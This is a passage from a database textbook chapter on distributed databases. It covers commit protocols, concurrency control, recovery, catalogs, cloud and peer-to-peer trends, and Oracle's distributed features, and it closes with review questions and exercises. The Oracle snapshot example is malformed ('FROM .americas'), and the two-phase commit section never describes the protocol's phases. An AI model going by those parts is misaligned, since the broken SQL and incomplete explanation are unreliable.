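WHERE P.Pnumber = W.Pno;

-- T2 at site 1: attach employee names to the shipped Essn values
SELECT T1.Essn, E.Fname, E.Lname
FROM T1, EMPLOYEE E
WHERE T1.Essn = E.Ssn;

-- RESULT at site 2: join T2 back with WORKS_ON5 to obtain the hours
SELECT T2.Fname, T2.Lname, W.Hours
FROM T2, WORKS_ON5 W
WHERE T2.Essn = W.Essn;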

6 Overview of Transaction Management
in Distributed Databases

The global and local transaction management software modules, along with the
concurrency control and recovery manager of a DDBMS, collectively guarantee the
ACID properties of transactions. We discuss distributed transaction management in
this section and explore concurrency control in Section 7.

As can be seen in Figure 5, an additional component called the global transaction
manager is introduced for supporting distributed transactions. The site where the
transaction originated can temporarily assume the role of global transaction man-
ager and coordinate the execution of database operations with transaction man-
agers across multiple sites. Transaction managers export their functionality as an
interface to the application programs. The manager stores bookkeeping informa-
tion related to each transaction, such as a unique identifier, originating site, name,
and so on. For READ operations, it returns a local copy if valid and available. For
WRITE operations, it ensures that updates are visible across all sites containing
copies (replicas) of the data item. For ABORT operations, the manager ensures that
no effects of the transaction are reflected in any site of the distributed database. For
COMMIT operations, it ensures that the effects of a write are persistently recorded on
all databases containing copies of the data item. Atomic termination (COMMIT/
ABORT) of distributed transactions is commonly implemented using the two-phase
commit protocol. We give more details of this protocol in the following section.


The transaction manager passes to the concurrency controller the database opera-
tion and associated information. The controller is responsible for acquisition and
release of associated locks. If the transaction requires access to a locked resource, it
is delayed until the lock is acquired. Once the lock is acquired, the operation is sent
to the runtime processor, which handles the actual execution of the database opera-
tion. Once the operation is completed, locks are released and the transaction man-
ager is updated with the result of the operation. We discuss commonly used
distributed concurrency methods in Section 7.

6.1 Two-Phase Commit Protocol
The two-phase commit protocol (2PC) requires a global recovery manager, or
coordinator, to maintain information needed for recovery, in addition to the local
recovery managers and the information they maintain (log, tables). The two-phase
commit protocol has certain drawbacks that led to the development of the three-
phase commit protocol, which we discuss next.

6.2 Three-Phase Commit Protocol
The biggest drawback of 2PC is that it is a blocking protocol. Failure of the coordi-
nator blocks all participating sites, causing them to wait until the coordinator recov-
ers. This can cause performance degradation, especially if participants are holding
locks to shared resources. Another problematic scenario is when both the coordina-
tor and a participant that has committed crash together. In the two-phase commit
protocol, a participant has no way to ensure that all participants got the commit
message in the second phase. Hence, once the coordinator has made the decision to
commit in the first phase, each participant commits its transaction in the second
phase regardless of whether the other participants have received the global commit
message. Thus, if both the coordinator and a committed participant crash together,
the result of the transaction becomes uncertain or nondeterministic.
Since the transaction has already been committed by one participant, it cannot be
aborted on recovery by the coordinator. Also, the transaction cannot be optimisti-
cally committed on recovery since the original vote of the coordinator may have
been to abort.

These problems are solved by the three-phase commit (3PC) protocol, which essen-
tially divides the second commit phase into two subphases called prepare-to-
commit and commit. The prepare-to-commit phase is used to communicate the
result of the vote phase to all participants. If all participants vote yes, then the coordi-
nator instructs them to move into the prepare-to-commit state. The commit subphase
is identical to its two-phase counterpart. Now, if the coordinator crashes during this
subphase, another participant can see the transaction through to completion. It can
simply ask a crashed participant whether it received a prepare-to-commit message. If it
did not, then it can safely decide to abort. Thus the state of the protocol can be recovered
irrespective of which participant crashes. Also, by limiting the time required for a
transaction to commit or abort to a maximum time-out period, the protocol ensures
that a transaction attempting to commit via 3PC releases locks on time-out.


The main idea is to limit the wait time for participants who have committed and are
waiting for a global commit or abort from the coordinator. When a participant
receives a precommit message, it knows that the rest of the participants have voted
to commit. If a precommit message has not been received, then the participant will
abort and release all locks.

6.3 Operating System Support
for Transaction Management

The following are the main benefits of operating system (OS)-supported transac-
tion management:

■ Typically, DBMSs use their own semaphores9 to guarantee mutually exclu-
sive access to shared resources. Since these semaphores are implemented in
userspace at the level of the DBMS application software, the OS has no
knowledge about them. Hence if the OS deactivates a DBMS process holding
a lock, other DBMS processes wanting this lock resource get queued. Such a
situation can cause serious performance degradation. OS-level knowledge of
semaphores can help eliminate such situations.

■ Specialized hardware support for locking can be exploited to reduce associ-
ated costs. This can be of great importance, since locking is one of the most
common DBMS operations.

■ Providing a set of common transaction support operations through the ker-
nel allows application developers to focus on adding new features to their
products as opposed to reimplementing the common functionality for each
application. For example, if different DDBMSs are to coexist on the same
machine and they choose the two-phase commit protocol, then it is more
beneficial to have this protocol implemented as part of the kernel so that
the DDBMS developers can focus more on adding new features to their
products.

7 Overview of Concurrency Control
and Recovery in Distributed Databases

For concurrency control and recovery purposes, numerous problems arise in a dis-
tributed DBMS environment that are not encountered in a centralized DBMS envi-
ronment. These include the following:

■ Dealing with multiple copies of the data items. The concurrency control
method is responsible for maintaining consistency among these copies. The
recovery method is responsible for making a copy consistent with other
copies if the site on which the copy is stored fails and recovers later.

9Semaphores are data structures used for synchronized and exclusive access to shared resources for
preventing race conditions in a parallel computing system.

■ Failure of individual sites. The DDBMS should continue to operate with its
running sites, if possible, when one or more individual sites fail. When a site
recovers, its local database must be brought up-to-date with the rest of the
sites before it rejoins the system.

■ Failure of communication links. The system must be able to deal with the
failure of one or more of the communication links that connect the sites. An
extreme case of this problem is that network partitioning may occur. This
breaks up the sites into two or more partitions, where the sites within each
partition can communicate only with one another and not with sites in other
partitions.

■ Distributed commit. Problems can arise with committing a transaction that
is accessing databases stored on multiple sites if some sites fail during the
commit process. The two-phase commit protocol is often used to deal with
this problem.

■ Distributed deadlock. Deadlock may occur among several sites, so tech-
niques for dealing with deadlocks must be extended to take this into
account.

Distributed concurrency control and recovery techniques must deal with these and
other problems. In the following subsections, we review some of the techniques that
have been suggested to deal with recovery and concurrency control in DDBMSs.

7.1 Distributed Concurrency Control Based
on a Distinguished Copy of a Data Item

To deal with replicated data items in a distributed database, a number of concur-
rency control methods have been proposed that extend the concurrency control
techniques for centralized databases. We discuss these techniques in the context of
extending centralized locking. Similar extensions apply to other concurrency control
techniques. The idea is to designate a particular copy of each data item as a
distinguished copy. The locks for this data item are associated with the distin-
guished copy, and all locking and unlocking requests are sent to the site that contains
that copy.

A number of different methods are based on this idea, but they differ in their
method of choosing the distinguished copies. In the primary site technique, all dis-
tinguished copies are kept at the same site. A modification of this approach is the
primary site with a backup site. Another approach is the primary copy method,
where the distinguished copies of the various data items can be stored in different
sites. A site that includes a distinguished copy of a data item basically acts as the
coordinator site for concurrency control on that item. We discuss these techniques
next.

Primary Site Technique. In this method a single primary site is designated to be
the coordinator site for all database items. Hence, all locks are kept at that site, and
all requests for locking or unlocking are sent there. This method is thus an extension
of the centralized locking approach. For example, if all transactions follow the two-
phase locking protocol, serializability is guaranteed. The advantage of this approach
is that it is a simple extension of the centralized approach and thus is not overly
complex. However, it has certain inherent disadvantages. One is that all locking
requests are sent to a single site, possibly overloading that site and causing a system
bottleneck. A second disadvantage is that failure of the primary site paralyzes the
system, since all locking information is kept at that site. This can limit system relia-
bility and availability.

Although all locks are accessed at the primary site, the items themselves can be
accessed at any site at which they reside. For example, once a transaction obtains a
Read_lock on a data item from the primary site, it can access any copy of that data
item. However, once a transaction obtains a Write_lock and updates a data item, the
DDBMS is responsible for updating all copies of the data item before releasing the
lock.

Primary Site with Backup Site. This approach addresses the second disadvantage
of the primary site method by designating a second site to be a backup site. All lock-
ing information is maintained at both the primary and the backup sites. In case of
primary site failure, the backup site takes over as the primary site, and a new backup
site is chosen. This simplifies the process of recovery from failure of the primary site,
since the backup site takes over and processing can resume after a new backup site is
chosen and the lock status information is copied to that site. It slows down the
process of acquiring locks, however, because all lock requests and granting of locks
must be recorded at both the primary and the backup sites before a response is sent to
the requesting transaction. The problem of the primary and backup sites becoming
overloaded with requests and slowing down the system remains undiminished.

Primary Copy Technique. This method attempts to distribute the load of lock
coordination among various sites by having the distinguished copies of different
data items stored at different sites. Failure of one site affects any transactions that are
accessing locks on items whose primary copies reside at that site, but other transac-
tions are not affected. This method can also use backup sites to enhance reliability
and availability.

Choosing a New Coordinator Site in Case of Failure. Whenever a coordina-
tor site fails in any of the preceding techniques, the sites that are still running must
choose a new coordinator. In the case of the primary site approach with no backup
site, all executing transactions must be aborted and restarted in a tedious recovery
process. Part of the recovery process involves choosing a new primary site and creat-
ing a lock manager process and a record of all lock information at that site. For
methods that use backup sites, transaction processing is suspended while the
backup site is designated as the new primary site and a new backup site is chosen
and is sent copies of all the locking information from the new primary site.

If a backup site X is about to become the new primary site, X can choose the new
backup site from among the system's running sites. However, if no backup site
existed, or if both the primary and the backup sites are down, a process called
election can be used to choose the new coordinator site. In this process, any site Y
that attempts to communicate with the coordinator site repeatedly and fails to do so
can assume that the coordinator is down and can start the election process by send-
ing a message to all running sites proposing that Y become the new coordinator. As
soon as Y receives a majority of yes votes, Y can declare that it is the new coordina-
tor. The election algorithm itself is quite complex, but this is the main idea behind
the election method. The algorithm also resolves any attempt by two or more sites
to become coordinator at the same time. The references in the Selected Bibliography
at the end of this chapter discuss the process in detail.

7.2 Distributed Concurrency Control Based on Voting
The concurrency control methods for replicated items discussed earlier all use the
idea of a distinguished copy that maintains the locks for that item. In the voting
method, there is no distinguished copy; rather, a lock request is sent to all sites that
include a copy of the data item. Each copy maintains its own lock and can grant or
deny the request for it. If a transaction that requests a lock is granted that lock by a
majority of the copies, it holds the lock and informs all copies that it has been
granted the lock. If a transaction does not receive a majority of votes granting it a
lock within a certain time-out period, it cancels its request and informs all sites of
the cancellation.

The voting method is considered a truly distributed concurrency control method,
since the responsibility for a decision resides with all the sites involved. Simulation
studies have shown that voting has higher message traffic among sites than do the
distinguished copy methods. If the algorithm takes into account possible site fail-
ures during the voting process, it becomes extremely complex.

7.3 Distributed Recovery
The recovery process in distributed databases is quite involved. We give only a very
brief idea of some of the issues here. In some cases it is quite difficult even to deter-
mine whether a site is down without exchanging numerous messages with other
sites. For example, suppose that site X sends a message to site Y and expects a
response from Y but does not receive it. There are several possible explanations:

■ The message was not delivered to Y because of communication failure.

■ Site Y is down and could not respond.

■ Site Y is running and sent a response, but the response was not delivered.

Without additional information or the sending of additional messages, it is difficult
to determine what actually happened.

Another problem with distributed recovery is distributed commit. When a transac-
tion is updating data at several sites, it cannot commit until it is sure that the effect
of the transaction on every site cannot be lost. This means that every site must first
have recorded the local effects of the transaction permanently in the local site log
on disk. The two-phase commit protocol is often used to ensure the correctness of
distributed commit.

8 Distributed Catalog Management
Efficient catalog management in distributed databases is critical to ensure satisfac-
tory performance related to site autonomy, view management, and data distribution
and replication. Catalogs are databases themselves containing metadata about the
distributed database system.

Three popular management schemes for distributed catalogs are centralized catalogs,
fully replicated catalogs, and partially replicated catalogs. The choice of the scheme
depends on the database itself as well as the access patterns of the applications to the
underlying data.

Centralized Catalogs. In this scheme, the entire catalog is stored in one single
site. Owing to its central nature, it is easy to implement. On the other hand, the
advantages of reliability, availability, autonomy, and distribution of processing load
are adversely impacted. For read operations from noncentral sites, the requested
catalog data is locked at the central site and is then sent to the requesting site. On
completion of the read operation, an acknowledgement is sent to the central site,
which in turn unlocks this data. All update operations must be processed through
the central site. This can quickly become a performance bottleneck for write-
intensive applications.

Fully Replicated Catalogs. In this scheme, identical copies of the complete cata-
log are present at each site. This scheme facilitates faster reads by allowing them to
be answered locally. However, all updates must be broadcast to all sites. Updates are
treated as transactions and a centralized two-phase commit scheme is employed to
ensure catalog consistency. As with the centralized scheme, write-intensive applica-
tions may cause increased network traffic due to the broadcast associated with the
writes.

Partially Replicated Catalogs. The centralized and fully replicated schemes
restrict site autonomy since they must ensure a consistent global view of the catalog.
Under the partially replicated scheme, each site maintains complete catalog infor-
mation on data stored locally at that site. Each site is also permitted to cache entries
retrieved from remote sites. However, there are no guarantees that these cached
copies will be the most recent and updated. The system tracks catalog entries for
sites where the object was created and for sites that contain copies of this object. Any
changes to copies are propagated immediately to the original (birth) site. Retrieving
updated copies to replace stale data may be delayed until an access to this data
occurs. In general, fragments of relations across sites should be uniquely accessible.
Also, to ensure data distribution transparency, users should be allowed to create
synonyms for remote objects and use these synonyms for subsequent referrals.
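
As a small, hedged illustration of that last point, a synonym (shown here in Oracle-style SQL, with hypothetical object and link names) can hide the site at which a remote object resides:

CREATE SYNONYM parts FOR parts@site2_link;   -- local alias for a remote fragment

-- Subsequent references use the synonym rather than the remote name.
SELECT * FROM parts WHERE Weight > 10;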

9 Current Trends in Distributed Databases
Current trends in distributed data management are centered on the Internet, in
which petabytes of data can be managed in a scalable, dynamic, and reliable fashion.
Two important areas in this direction are cloud computing and peer-to-peer data-
bases.

9.1 Cloud Computing
Cloud computing is the paradigm of offering computer infrastructure, platforms,
and software as services over the Internet. It offers significant economic advantages
by limiting both up-front capital investments toward computer infrastructure as
well as total cost of ownership. It has introduced a new challenge of managing
petabytes of data in a scalable fashion. Traditional database systems for managing
enterprise data proved to be inadequate in handling this challenge, which has
resulted in a major architectural revision. The Claremont report10 by a group of
senior database researchers envisions that future research in cloud computing will
result in the emergence of new data management architectures and the interplay of
structured and unstructured data as well as other developments.

The costs associated with partial failures and global synchronization were key
performance bottlenecks of traditional database solutions. The key insight is that
the hash-value nature of the datasets used by large Web companies lends itself
naturally to partitioning. For instance, search queries essentially involve
a recursive process of mapping keywords to a set of related documents, which can
benefit from such a partitioning. Also, the partitions can be treated independently,
thereby eliminating the need for a coordinated commit. Another problem with tra-
ditional DDBMSs is the lack of support for efficient dynamic partitioning of data,
which limited scalability and resource utilization. Traditional systems treated sys-
tem metadata and application data alike, with the system data requiring strict con-
sistency and availability guarantees. But application data has variable requirements
on these characteristics, depending on its nature. For example, while a search engine
can afford weaker consistency guarantees, an online text editor like Google Docs,
which allows concurrent users, has strict consistency requirements.

The metadata of a distributed database system should be decoupled from its actual
data in order to ensure scalability. This decoupling can be used to develop innova-
tive solutions to manage the actual data by exploiting their inherent suitability to
partitioning and using traditional database solutions to manage critical system
metadata. Since metadata is only a fraction of the total data set, it does not prove to
be a performance bottleneck. Single object semantics of these implementations
enables higher tolerance to nonavailability of certain sections of data. Access to data
is typically by a single object in an atomic fashion. Hence, transaction support to
such data is not as stringent as for traditional databases.11 There is a varied set of cloud services available today, including application services (salesforce.com), storage services (Amazon Simple Storage Service, or Amazon S3), compute services (Google App Engine, Amazon Elastic Compute Cloud—Amazon EC2), and data services (Amazon SimpleDB, Microsoft SQL Server Data Services, Google's Datastore). More and more data-centric applications are expected to leverage data services in the cloud. While most current cloud services are data-analysis intensive, it is expected that business logic will eventually be migrated to the cloud. The key challenge in this migration would be to ensure the scalability advantages for multiple object semantics inherent to business logic. For a detailed treatment of cloud computing, refer to the relevant bibliographic references in this chapter's Selected Bibliography.

10"The Claremont Report on Database Research" is available at http://db.cs.berkeley.edu/claremont/claremontreport08.pdf.
11Readers may refer to the work done by Das et al. (2008) for further details.

9.2 Peer-to-Peer Database Systems
A peer-to-peer database system (PDBS) aims to integrate advantages of P2P (peer-
to-peer) computing, such as scalability, attack resilience, and self-organization, with
the features of decentralized data management. Nodes are autonomous and are
linked only to a small number of peers individually. It is permissible for a node to
behave purely as a collection of files without offering a complete set of traditional
DBMS functionality. While FDBS and MDBS mandate the existence of mappings
between local and global federated schemas, PDBSs attempt to avoid a global
schema by providing mappings between pairs of information sources. In PDBS,
each peer potentially models semantically related data in a manner different from
other peers, and hence the task of constructing a central mediated schema can be
very challenging. PDBSs aim to decentralize data sharing. Each peer has a schema
associated with its domain-specific stored data. The PDBS constructs a semantic
path12 of mappings between peer schemas. Using this path, a peer to which a query
has been submitted can obtain information from any relevant peer connected
through this path. In multidatabase systems, a separate global query processor is
used, whereas in a P2P system a query is shipped from one peer to another until it is
processed completely. A query submitted to a node may be forwarded to others
based on the mapping graph of semantic paths. Edutella and Piazza are examples of
PDBSs. Details of these systems can be found from the sources mentioned in this
chapter’s Selected Bibliography.

10 Distributed Databases in Oracle13

Oracle provides support for homogeneous, heterogeneous, and client-server architectures of distributed databases. In a homogeneous architecture, at least two Oracle databases reside on one or more machines. Although the location and platform of the databases are transparent to client applications, users would still need to distinguish between local and remote objects semantically. This need can be overcome by using synonyms, which let users access remote objects with the same syntax as local objects. Different versions of the DBMS can be used, although it must be noted that Oracle offers backward compatibility but not forward compatibility between its versions. For example, some of the SQL extensions that were incorporated into Oracle 11g may not be understood by Oracle 9i.

12A semantic path describes the higher-level relationship between two domains that are dissimilar but not unrelated.
13The discussion is based on available documentation at http://docs.oracle.com.

In a heterogeneous architecture, at least one of the databases in the network is a
non-Oracle system. The Oracle database local to the application hides the underly-
ing heterogeneity and offers the view of a single local, underlying Oracle database.
Connectivity is handled by use of an ODBC- or OLE-DB-compliant protocol or by
Oracle’s Heterogeneous Services and Transparent Gateway agent components. A
discussion of the Heterogeneous Services and Transparent Gateway agents is
beyond the scope of this text, and the reader is advised to consult the online Oracle
documentation.

In the client-server architecture, the Oracle database system is divided into two
parts: a front end as the client portion, and a back end as the server portion. The
client portion is the front-end database application that interacts with the user. The
client has no data access responsibility and merely handles the requesting, process-
ing, and presentation of data managed by the server. The server portion runs Oracle
and handles the functions related to concurrent shared access. It accepts SQL and
PL/SQL statements originating from client applications, processes them, and sends
the results back to the client. Oracle client-server applications provide location
transparency by making the location of data transparent to users; several features,
such as views, synonyms, and procedures, contribute to this. Global naming is achieved
by qualifying each table name with the database's unique global name.
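
As a hedged illustration (the view and column names are hypothetical), a view or synonym defined over a remote table lets users query it with the same syntax as a local object:

CREATE VIEW emp AS
  SELECT * FROM EMP@SALES;     -- remote table reached through a database link

SELECT Name, Salary FROM emp;  -- queried as if it were a local object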

Oracle uses a two-phase commit protocol to coordinate the commitment of distributed
transactions. The COMMIT statement triggers the two-phase commit mechanism. The
RECO (recoverer) background process automatically resolves the outcome of those
distributed transactions in which the commit was interrupted. The RECO of each
local Oracle server automatically commits or rolls back any in-doubt distributed
transactions consistently on all involved nodes. For long-term failures, Oracle
allows each local DBA to manually commit or roll back any in-doubt transactions
and free up resources. Global consistency can be maintained by restoring the data-
base at each site to a predetermined fixed point in the past.

Oracle’s distributed database architecture is shown in Figure 12. A node in a distrib-
uted database system can act as a client, as a server, or both, depending on the situa-
tion. The figure shows two sites where databases called HQ (headquarters) and Sales
are kept. For example, in the application shown running at the headquarters, for an
SQL statement issued against local data (for example, DELETE FROM DEPT …), the
HQ computer acts as a server, whereas for a statement against remote data (for
example, INSERT INTO EMP@SALES), the HQ computer acts as a client.
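
Putting such statements together, the following sketch shows a distributed transaction issued at HQ (the column names and values are illustrative, not taken from Figure 12); when the COMMIT is issued, Oracle runs the two-phase commit protocol across the HQ and Sales sites:

DELETE FROM DEPT WHERE Dnumber = 40;     -- local data at HQ
INSERT INTO EMP@SALES (Name, Ssn, Dno)   -- remote data at the Sales site
VALUES ('R. Jones', '987654321', 30);
COMMIT;                                  -- two-phase commit across HQ and Sales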

Figure 12
Oracle distributed database system. The figure shows two servers connected through Oracle Net over a network: an HQ database holding the DEPT table and a Sales database holding the EMP table, joined by a database link. The application transaction running at HQ issues statements such as DELETE FROM DEPT ..., INSERT INTO EMP@SALES ..., SELECT ... FROM EMP@SALES ..., and COMMIT.

Source: From Oracle (2008). Copyright © Oracle Corporation 2008. All rights reserved.

Communication in such a distributed heterogeneous environment is facilitated through Oracle Net Services, which supports standard network protocols and APIs. Under Oracle's client-server implementation of distributed databases, Net Services is responsible for establishing and managing connections between a client application and a database server. It is present in each node on the network running an Oracle client application, a database server, or both. It packages SQL statements into one of the many communication protocols to facilitate client-to-server communication and then packages the results back similarly to the client. The heterogeneity support offered by Net Services covers platform differences only, not differences in database software; support for DBMSs other than Oracle is provided through Oracle's Heterogeneous Services and Transparent Gateway. Each database has a unique global name formed by appending a hierarchical arrangement of network domain names to the database name to make it unique.

Oracle supports database links that define a one-way communication path from
one Oracle database to another. For example,

CREATE DATABASE LINK sales.us.americas;

establishes a connection to the sales database in Figure 12 under the network
domain us that comes under domain americas. Using links, a user can access a
remote object on another database, subject to ownership rights, without needing to
be a user on the remote database.
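
For instance (a sketch with illustrative column names), once the link above is defined, a query issued at HQ can reference the remote EMP table through it:

SELECT Name, Salary
FROM EMP@sales.us.americas
WHERE Dno = 10;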

Data in an Oracle DDBS can be replicated using snapshots or replicated master
tables. Replication is provided at the following levels:

■ Basic replication. Replicas of tables are managed for read-only access. For
updates, data must be accessed at a single primary site.

■ Advanced (symmetric) replication. This extends beyond basic replication by allowing applications to update table replicas throughout a replicated DDBS. Data can be read and updated at any site. This requires additional software called Oracle's advanced replication option.

A snapshot generates a copy of a part of a table by means of a query called the snapshot defining query. A simple snapshot definition looks like this:

CREATE SNAPSHOT SALES_ORDERS AS
SELECT * FROM .americas;

Oracle groups snapshots into refresh groups. By specifying a refresh interval, the
snapshot is automatically refreshed periodically at that interval by up to ten
Snapshot Refresh Processes (SNPs). If the defining query of a snapshot contains a
distinct or aggregate function, a GROUP BY or CONNECT BY clause, or join or set
operations, the snapshot is termed a complex snapshot and requires additional
processing. Oracle (up to version 7.3) also supports ROWID snapshots that are
based on physical row identifiers of rows in the master table.
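
As a hedged sketch of such a definition (approximate syntax for the older CREATE SNAPSHOT form, which corresponds to materialized views in later Oracle releases; the object and link names are hypothetical), a refresh interval can be attached directly to the snapshot so that it is refreshed automatically once a day:

CREATE SNAPSHOT sales_orders
  REFRESH COMPLETE
  START WITH SYSDATE NEXT SYSDATE + 1
  AS SELECT * FROM orders@sales.us.americas;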

Heterogeneous Databases in Oracle. In a heterogeneous DDBS, at least one
database is a non-Oracle system. Oracle Open Gateways provides access to a non-
Oracle database from an Oracle server, which uses a database link to access data or
to execute remote procedures in the non-Oracle system. The Open Gateways feature
includes the following:

■ Distributed transactions. Under the two-phase commit mechanism, trans-
actions may span Oracle and non-Oracle systems.

■ Transparent SQL access. SQL statements issued by an application are trans-
parently transformed into SQL statements understood by the non-Oracle
system.

■ Pass-through SQL and stored procedures. An application can directly
access a non-Oracle system using that system’s version of SQL. Stored proce-
dures in a non-Oracle SQL-based system are treated as if they were PL/SQL
remote procedures.

■ Global query optimization. Cardinality information, indexes, and so on at
the non-Oracle system are accounted for by the Oracle server query opti-
mizer to perform global query optimization.

■ Procedural access. Procedural systems like messaging or queuing systems
are accessed by the Oracle server using PL/SQL remote procedure calls.

In addition to the above, data dictionary references are translated to make the non-
Oracle data dictionary appear as a part of the Oracle server’s dictionary. Character
set translations are done between national language character sets to connect multi-
lingual databases.

From a security perspective, Oracle recommends that if a query originates at site A
and accesses sites B, C, and D, then the auditing of links should be done in the data-
base at site A only. This is because the remote databases cannot distinguish whether
a successful connection request and following SQL statements are coming from
another server or a locally connected client.

10.1 Directory Services
A concept closely related with distributed enterprise systems is online directories.
Online directories are essentially a structured organization of metadata needed for
management functions. They can represent information about a variety of sources,
ranging from security credentials and shared network resources to database catalogs.
Lightweight Directory Access Protocol (LDAP) is an industry standard protocol
for directory services. LDAP enables the use of a partitioned Directory
Information Tree (DIT) across multiple LDAP servers, which in turn can return
references to other servers as a result of a directory query. Online directories and
LDAP are particularly important in distributed databases, wherein access of meta-
data related to transparencies discussed in Section 1 must be scalable, secure, and
highly available.

Oracle supports LDAP Version 3 and online directories through Oracle Internet
Directory, a general-purpose directory service for fast access and centralized man-
agement of metadata pertaining to distributed network resources and users. It runs
as an application on an Oracle database and communicates with the database
through Oracle Net Services. It also provides password-based, anonymous, and
certificate-based user authentication using SSL Version 3.

Figure 13 illustrates the architecture of the Oracle Internet Directory. The main
components are:

■ Oracle directory server. Handles client requests and updates for informa-
tion pertaining to people and resources.

■ Oracle directory replication server. Stores a copy of the LDAP data from
Oracle directory servers as a backup.

■ Directory administrator. Supports both GUI-based and command line-based
interfaces for directory administration.

Figure 13
Oracle Internet Directory overview. The figure shows LDAP clients and directory administration tools communicating over LDAP (with SSL) with the Oracle directory server and the Oracle directory replication server, which in turn connect through Oracle Net connections to the underlying Oracle application and server database.

Source: From Oracle (2005). Copyright © Oracle Corporation 2005. All rights reserved.

11 Summary
In this chapter we provided an introduction to distributed databases. This is a very
broad topic, and we discussed only some of the basic techniques used with distributed
databases. First we discussed the reasons for distribution and the potential
advantages of distributed databases over centralized systems. Then the concept of

distribution transparency and the related concepts of fragmentation transparency
and replication transparency were defined. We categorized DDBMSs by using crite-
ria such as the degree of homogeneity of software modules and the degree of local
autonomy. We distinguished between parallel and distributed system architectures
and then introduced the generic architecture of distributed databases from both a
component as well as a schematic architectural perspective. The issues of federated
database management were then discussed in some detail, focusing on the needs of
supporting various types of autonomies and dealing with semantic heterogeneity.
We also reviewed the client-server architecture concepts and related them to distrib-
uted databases. We discussed the design issues related to data fragmentation, repli-
cation, and distribution, and we distinguished between horizontal and vertical
fragments of relations. The use of data replication to improve system reliability and
availability was then discussed. We illustrated some of the techniques used in dis-
tributed query processing and discussed the cost of communication among sites,
which is considered a major factor in distributed query optimization. The different
techniques for executing joins were compared and we then presented the semijoin
technique for joining relations that reside on different sites. Then we discussed
transaction management, including different commit protocols and operating sys-
tem support for transaction management. We briefly discussed the concurrency
control and recovery techniques used in DDBMSs, and then reviewed some of the
additional problems that must be dealt with in a distributed environment that do
not appear in a centralized environment. We reviewed catalog management in
distributed databases and summarized the relative advantages and disadvantages of
the different schemes. We then introduced cloud computing and peer-to-peer
database systems as new focus areas in distributed databases, in response to the need
for managing petabytes of information accessible over the Internet today.

We described some of the facilities in Oracle to support distributed databases. We
also discussed online directories and the LDAP protocol in brief.

Review Questions
1. What are the main reasons for and potential advantages of distributed databases?

2. What additional functions does a DDBMS have over a centralized DBMS?

3. Discuss what is meant by the following terms: degree of homogeneity of a
DDBMS, degree of local autonomy of a DDBMS, federated DBMS, distribution
transparency, fragmentation transparency, replication transparency,
multidatabase system.

4. Discuss the architecture of a DDBMS. Within the context of a centralized
DBMS, briefly explain new components introduced by the distribution of
data.

5. What are the main software modules of a DDBMS? Discuss the main func-
tions of each of these modules in the context of the client-server architec-
ture.

6. Compare the two-tier and three-tier client-server architectures.

7. What is a fragment of a relation? What are the main types of fragments? Why
is fragmentation a useful concept in distributed database design?

8. Why is data replication useful in DDBMSs? What typical units of data are
replicated?

9. What is meant by data allocation in distributed database design? What typi-
cal units of data are distributed over sites?

10. How is a horizontal partitioning of a relation specified? How can a relation
be put back together from a complete horizontal partitioning?

11. How is a vertical partitioning of a relation specified? How can a relation be
put back together from a complete vertical partitioning?

12. Discuss the naming problem in distributed databases.

13. What are the different stages of processing a query in a DDBMS?

14. Discuss the different techniques for executing an equijoin of two files located
at different sites. What main factors affect the cost of data transfer?

15. Discuss the semijoin method for executing an equijoin of two files located at
different sites. Under what conditions is the semijoin strategy efficient?

16. Discuss the factors that affect query decomposition. How are guard condi-
tions and attribute lists of fragments used during the query decomposition
process?

17. How is the decomposition of an update request different from the decompo-
sition of a query? How are guard conditions and attribute lists of fragments
used during the decomposition of an update request?

18. List the support offered by operating systems to a DDBMS and also their
benefits.

19. Discuss the factors that do not appear in centralized systems that affect con-
currency control and recovery in distributed systems.

20. Discuss the two-phase commit protocol used for transaction management in
a DDBMS. List its limitations and explain how they are overcome using the
three-phase commit protocol.

21. Compare the primary site method with the primary copy method for dis-
tributed concurrency control. How does the use of backup sites affect each?

22. When are voting and elections used in distributed databases?

23. Discuss catalog management in distributed databases.

24. What are the main challenges facing a traditional DDBMS in the context of
today’s Internet applications? How does cloud computing attempt to address
them?

25. Discuss briefly the support offered by Oracle for homogeneous, heteroge-
neous, and client-server based distributed database architectures.

26. Discuss briefly online directories, their management, and their role in dis-
tributed databases.

Exercises
27. Consider the data distribution of the COMPANY database, where the fragments at sites 2 and 3 are as shown in Figure 9 and the fragments at site 1 are
as shown in Figure A.2. For each of the following queries, show at least two
strategies of decomposing and executing the query. Under what conditions
would each of your strategies work well?

a. For each employee in department 5, retrieve the employee name and the
names of the employee’s dependents.

b. Print the names of all employees who work in department 5 but who
work on some project not controlled by department 5.

28. Consider the following relations:

BOOKS(Book#, Primary_author, Topic, Total_stock, $price)
BOOKSTORE(Store#, City, State, Zip, Inventory_value)
STOCK(Store#, Book#, Qty)

Total_stock is the total number of books in stock and Inventory_value is the
total inventory value for the store in dollars.

a. Give an example of two simple predicates that would be meaningful for
the BOOKSTORE relation for horizontal partitioning.

b. How would a derived horizontal partitioning of STOCK be defined based
on the partitioning of BOOKSTORE?

c. Show predicates by which BOOKS may be horizontally partitioned by
topic.

d. Show how the STOCK may be further partitioned from the partitions in
(b) by adding the predicates in (c).

29. Consider a distributed database for a bookstore chain called National Books
with three sites called EAST, MIDDLE, and WEST. The relation schemas are
given in Exercise 28. Consider that BOOKS are fragmented by $price
amounts into:

B1: BOOK1: $price up to $20
B2: BOOK2: $price from $20.01 to $50
B3: BOOK3: $price from $50.01 to $100
B4: BOOK4: $price $100.01 and above

Similarly, BOOKSTORE is divided by Zip codes into:

S1: EAST: Zip up to 35000
S2: MIDDLE: Zip 35001 to 70000
S3: WEST: Zip 70001 to 99999

Assume that STOCK is a derived fragment based on BOOKSTORE only.

a. Consider the query:

SELECT Book#, Total_stock
FROM Books
WHERE $price > 15 AND $price < 55;

Assume that fragments of BOOKSTORE are nonreplicated and assigned based on region. Assume further that BOOKS are allocated as:

EAST: B1, B4
MIDDLE: B1, B2
WEST: B1, B2, B3, B4

Assuming the query was submitted in EAST, what remote subqueries does it generate? (Write in SQL.)

b. If the price of Book# = 1234 is updated from $45 to $55 at site MIDDLE, what updates does that generate? Write in English and then in SQL.

c. Give a sample query issued at WEST that will generate a subquery for MIDDLE.

d. Write a query involving selection and projection on the above relations and show two possible query trees that denote different ways of execution.

30. Consider that you have been asked to propose a database architecture in a large organization (General Motors, for example) to consolidate all data, including legacy databases (from hierarchical and network models; no specific knowledge of these models is needed) as well as relational databases, which are geographically distributed so that global applications can be supported. Assume that alternative one is to keep all databases as they are, while alternative two is to first convert them to relational and then support the applications over a distributed integrated database.

a. Draw two schematic diagrams for the above alternatives showing the linkages among appropriate schemas. For alternative one, choose the approach of providing export schemas for each database and constructing unified schemas for each application.

